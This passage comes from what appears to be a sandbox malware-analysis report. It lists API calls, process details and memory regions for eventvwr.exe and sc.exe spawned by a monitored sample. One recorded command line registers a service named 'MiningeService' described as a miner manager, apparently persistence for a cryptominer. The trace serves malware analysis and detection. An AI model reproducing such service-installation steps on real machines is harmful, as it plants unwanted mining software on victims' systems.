hConsoleHandle=0x214, lpMode=0x4ab541ac | out: lpMode=0x4ab541ac) returned 0 [0277.118] _get_osfhandle (_FileHandle=0) returned 0x20c [0277.118] GetConsoleMode (in: hConsoleHandle=0x20c, lpMode=0x4ab541b0 | out: lpMode=0x4ab541b0) returned 0 [0277.118] GetConsoleOutputCP () returned 0x1b5 [0277.119] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ab54260 | out: lpCPInfo=0x4ab54260) returned 1 [0277.119] SetThreadUILanguage (LangId=0x0) returned 0x409 [0277.120] exit (_Code=0) Process: id = "31" image_name = "eventvwr.exe" filename = "c:\\windows\\syswow64\\eventvwr.exe" page_root = "0x6b40c000" os_pid = "0xa80" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "18" os_parent_pid = "0xc88" cmd_line = "\"C:\\Windows\\SysWOW64\\eventvwr.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6134 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6135 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6136 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6137 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 6138 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 6139 start_va = 0x90000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 6140 start_va = 0x1d0000 end_va = 0x20ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 6141 start_va = 0x800000 end_va = 0x816fff monitored = 0 entry_point = 0x8025af region_type = mapped_file name = "eventvwr.exe" filename = "\\Windows\\SysWOW64\\eventvwr.exe" (normalized: "c:\\windows\\syswow64\\eventvwr.exe") Region: id = 6142 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6143 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6144 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 6145 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 6146 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 6147 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 6148 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6149 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6150 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6151 start_va = 0x390000 end_va = 0x40ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 6152 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6153 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6154 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6155 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6156 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6157 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6158 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 6159 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6160 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 6161 start_va = 0x410000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 6162 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6163 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6165 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6166 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 6167 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 6168 start_va = 0xd0000 end_va = 0x136fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6169 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 6170 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 6171 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 6172 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 6173 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6174 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 6175 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6176 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6177 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6178 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6179 start_va = 0x75cb0000 end_va = 0x768f9fff monitored = 0 entry_point = 0x75d31601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 6180 start_va = 0x771d0000 end_va = 0x77226fff monitored = 0 entry_point = 0x771e9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 6181 start_va = 0x210000 end_va = 0x31ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 6182 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6183 start_va = 0x820000 end_va = 0x9a7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 6184 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6185 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 6186 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 6220 start_va = 0x9b0000 end_va = 0xb30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 6221 start_va = 0xb40000 end_va = 0x1f3ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b40000" filename = "" Region: id = 6222 start_va = 0x20000 end_va = 0x21fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "eventvwr.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\eventvwr.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\eventvwr.exe.mui") Region: id = 6223 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6224 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 6225 start_va = 0x1f40000 end_va = 0x220efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6226 start_va = 0x80000 end_va = 0x80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 6237 start_va = 0x180000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 6238 start_va = 0x470000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 6239 start_va = 0x590000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 6240 start_va = 0x76e80000 end_va = 0x76fdbfff monitored = 0 entry_point = 0x76ecba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 6241 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 6242 start_va = 0x74430000 end_va = 0x744affff monitored = 0 entry_point = 0x744437c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 6243 start_va = 0x210000 end_va = 0x2affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 6244 start_va = 0x310000 end_va = 0x31ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 6245 start_va = 0x4b0000 end_va = 0x58efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 6246 start_va = 0x740a0000 end_va = 0x74194fff monitored = 0 entry_point = 0x740b0d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 6247 start_va = 0x757f0000 end_va = 0x7587efff monitored = 0 entry_point = 0x757f3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 6248 start_va = 0x140000 end_va = 0x141fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 6249 start_va = 0x745f0000 end_va = 0x7478dfff monitored = 0 entry_point = 0x7461e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 6250 start_va = 0x150000 end_va = 0x150fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 6251 start_va = 0x160000 end_va = 0x161fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 6252 start_va = 0x150000 end_va = 0x150fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 6253 start_va = 0x77320000 end_va = 0x773a2fff monitored = 0 entry_point = 0x773223d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 6254 start_va = 0x170000 end_va = 0x170fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 6255 start_va = 0x745b0000 end_va = 0x745d0fff monitored = 0 entry_point = 0x745b145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 6256 start_va = 0x772d0000 end_va = 0x77314fff monitored = 0 entry_point = 0x772d11e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 6257 start_va = 0x1c0000 end_va = 0x1c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 6258 start_va = 0x210000 end_va = 0x226fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db") Region: id = 6259 start_va = 0x270000 end_va = 0x2affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 6260 start_va = 0x230000 end_va = 0x230fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 6261 start_va = 0x745e0000 end_va = 0x745eafff monitored = 0 entry_point = 0x745e1992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 6262 start_va = 0x75a80000 end_va = 0x75bb5fff monitored = 0 entry_point = 0x75a81b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 6263 start_va = 0x76d80000 end_va = 0x76e74fff monitored = 0 entry_point = 0x76d81865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 6264 start_va = 0x75880000 end_va = 0x75a7afff monitored = 0 entry_point = 0x758822d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 6265 start_va = 0x75650000 end_va = 0x75770fff monitored = 0 entry_point = 0x7565158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 6266 start_va = 0x76d70000 end_va = 0x76d7bfff monitored = 0 entry_point = 0x76d7238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 6270 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 6271 start_va = 0x6b0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 6272 start_va = 0x2210000 end_va = 0x224ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002210000" filename = "" Region: id = 6273 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 6274 start_va = 0x330000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 6275 start_va = 0x6f0000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 6276 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 6307 start_va = 0x77030000 end_va = 0x771ccfff monitored = 0 entry_point = 0x770317e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 6308 start_va = 0x77580000 end_va = 0x775a6fff monitored = 0 entry_point = 0x775858b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 6309 start_va = 0x76bf0000 end_va = 0x76c01fff monitored = 0 entry_point = 0x76bf1441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 6310 start_va = 0x2250000 end_va = 0x234ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002250000" filename = "" Region: id = 6311 start_va = 0x240000 end_va = 0x24cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\setupapi.dll.mui") Thread: id = 242 os_tid = 0xa84 Thread: id = 244 os_tid = 0xa90 Thread: id = 246 os_tid = 0xa98 Thread: id = 248 os_tid = 0xaa4 Process: id = "32" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x6b298000" os_pid = "0xa88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "30" os_parent_pid = "0xa68" cmd_line = "sc description MiningeService ServiceManagerForMiner" cur_dir = "C:\\Windows\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 6187 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 6188 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 6189 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 6190 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 6191 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 6192 start_va = 0xf0000 end_va = 0x12ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 6193 start_va = 0x130000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 6194 start_va = 0x8b0000 end_va = 0x8bbfff monitored = 1 entry_point = 0x8b7997 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 6195 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6196 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 6197 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 6198 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 6199 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 6200 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 6201 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 6202 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 6203 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 6204 start_va = 0x270000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 6205 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6206 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6207 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6208 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6209 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6210 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 6211 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 6212 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 6213 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 6214 start_va = 0x2f0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 6215 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6216 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6217 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6218 